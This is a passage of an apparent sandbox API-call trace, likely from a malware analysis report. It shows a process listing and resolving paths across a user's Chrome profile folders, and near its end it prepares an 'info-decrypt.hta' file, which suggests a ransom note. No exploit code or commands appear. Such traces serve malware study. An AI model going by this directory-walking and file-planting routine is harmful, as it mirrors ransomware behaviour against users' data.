dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.534] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.535] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0184.535] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0184.535] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0184.535] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVWhitelist", cAlternateFileName="EVWHIT~1")) returned 1 [0184.535] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileTypePolicies", cAlternateFileName="FILETY~1")) returned 1 [0184.536] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8b8920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8b8920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f8b8920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="First Run", cAlternateFileName="FIRSTR~1")) returned 1 [0184.536] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85749110, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c0bcce0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0bf3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1082a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local State", cAlternateFileName="LOCALS~1")) returned 1 [0184.536] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OriginTrials", cAlternateFileName="ORIGIN~1")) returned 1 [0184.536] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PepperFlash", cAlternateFileName="PEPPER~1")) returned 1 [0184.537] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e47510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e47510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pnacl", cAlternateFileName="")) returned 1 [0184.537] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f6e8b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs", cAlternateFileName="SAFEBR~3")) returned 1 [0184.537] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f94a10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs-journal", cAlternateFileName="SAFEBR~4")) returned 1 [0184.537] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Cookies", cAlternateFileName="SAFEBR~1")) returned 1 [0184.538] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Cookies-journal", cAlternateFileName="SAFEBR~2")) returned 1 [0184.538] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSLErrorAssistant", cAlternateFileName="SSLERR~1")) returned 1 [0184.538] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SwReporter", cAlternateFileName="SWREPO~1")) returned 1 [0184.538] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0184.538] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0184.539] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0184.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0184.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0184.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", lpFilePart=0x0) returned 0x5b [0184.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\", lpFilePart=0x0) returned 0x5c [0184.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.542] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.543] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0184.543] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0184.543] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0184.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0184.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency", lpFilePart=0x0) returned 0x5b [0184.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\", lpFilePart=0x0) returned 0x5c [0184.543] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.544] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.544] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0184.544] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0184.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0184.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0184.544] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpFilePart=0x0) returned 0x4c [0184.544] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpFilePart=0x0) returned 0x4d [0184.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f7d0 [0184.792] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.793] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5beda0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="metadata", cAlternateFileName="")) returned 1 [0184.793] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="reports", cAlternateFileName="")) returned 1 [0184.793] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0184.793] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0184.793] FindClose (in: hFindFile=0xb7f7d0 | out: hFindFile=0xb7f7d0) returned 1 [0184.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0184.794] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0184.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebdc) returned 1 [0184.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", nBufferLength=0x105, lpBuffer=0x949e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpFilePart=0x0) returned 0x4c [0184.794] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", nBufferLength=0x105, lpBuffer=0x949e6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpFilePart=0x0) returned 0x4d [0184.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x949e904 | out: lpFindFileData=0x949e904*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f7d0 [0184.794] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.794] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5beda0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="metadata", cAlternateFileName="")) returned 1 [0184.795] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="reports", cAlternateFileName="")) returned 1 [0184.795] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0184.795] FindNextFileW (in: hFindFile=0xb7f7d0, lpFindFileData=0x949e914 | out: lpFindFileData=0x949e914*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0184.795] FindClose (in: hFindFile=0xb7f7d0 | out: hFindFile=0xb7f7d0) returned 1 [0184.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb9c) returned 1 [0184.795] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eba8) returned 1 [0184.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", nBufferLength=0x105, lpBuffer=0x949e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpFilePart=0x0) returned 0x59 [0184.796] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e658, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS 